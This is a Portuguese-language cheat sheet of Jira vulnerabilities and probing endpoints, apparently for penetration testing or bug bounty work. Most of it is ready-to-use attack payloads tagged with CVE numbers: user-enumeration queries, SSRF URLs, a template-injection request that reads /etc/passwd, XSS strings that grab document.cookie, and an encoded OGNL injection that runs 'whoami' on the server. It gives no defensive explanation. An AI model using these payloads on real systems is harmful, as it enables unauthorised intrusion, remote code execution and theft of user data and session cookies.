common jira vulnerabilities

common jira vulnerabilities.txt

=== Vulnerabilidades mais comuns no Jira ===

CVE-2019-8449 Enumeração de usuários: /rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true 
>>==============================<<
CVE-2019-8451 SSRF: /plugins/servlet/gadgets/makeRequest?url=https://victimhost:1337@example.com
>>==============================<<
CVE-2019–11581: RCE: /secure/ContactAdministrators!default.jspa
>>==============================<<
CVE-2019-3396 RCE: POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: JIRA ...

{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler(.)com/v/23464dc5","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
>>==============================<<
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
>>==============================<<
CVE-2020-14181 Enumeração de usuários: /ViewUserHover.jspa?username=Admin
>>==============================<<
CVE-2017-9506 SSRF: /plugins/servlet/oauth/users/icon-uri?consumerUri=http:/example.com
>>==============================<<
CVE-2019-3403 Divulgação de informações: rest/rest/api/2/user/picker
>>==============================<<
CVE-2019-8442 diretório META-INF: /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
>>==============================<<
CVE-2019-3402 XSS: /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search
ConfigurePortalPages.jspa
>>==============================<<
CVE-2018-20824 XSS: /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true

=== Dashboards e Filtros Populares ===

Dashboards: /rest/api/2/dashboard?maxResults=100
>>==============================<<
Popular Filters: /secure/ManageFilters.jspa?filter=popular&filterView=popular

=== XSS ===

XSS: /pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
>>==============================<<





/secure/QueryComponent!Default.jspa (info)

/plugins/servlet/oauth/users/icon-uri?consumerUri= (SSRF/OPEN redirect)

/cgi-bin/printenv.pl (info)

/pages/createpage-entervariables.action?spacekey=x (RCE)

/%24%7b%28%23a%3d%40org.apache.commons.io.ioutils%40tostring%28%40java.lang.runtime%40getruntime%28%29.exec%28%22whoami%22%29.getinputstream%28%29%2c%22utf-8%22%29%29.%28%40com.opensymphony.webwork.servletactioncontext%40getresponse%28%29.setheader%28%22x-cmd-response%22%2c%23a%29%29%7d/ (RCE) 


Endpoints:

/rest/api/2/issueLinkType
/rest/api/2/priority
/rest/api/2/projectCategory
/rest/api/2/resolution
/rest/api/2/status
/rest/api/2/statuscategory
/rest/api/2/projectvalidate/key?key= 
/rest/api/2/jql/autocompletedata/ 
/rest/api/1.0/issues/14101/ActionsAndOperations
/rest/api/2/search
/rest/api/latest/avatar/project/system
/rest/api/2/user/assignable/multiProjectSearch?query=query&projectKeys=
/rest/gadget/1.0/createdVsResolved/generate
/rest/config/1.0/directory
/rest/menu/latest/appswitcher
/rest/menu/latest/admin
/rest/menu/latest/home
/rest/menu/latest/profile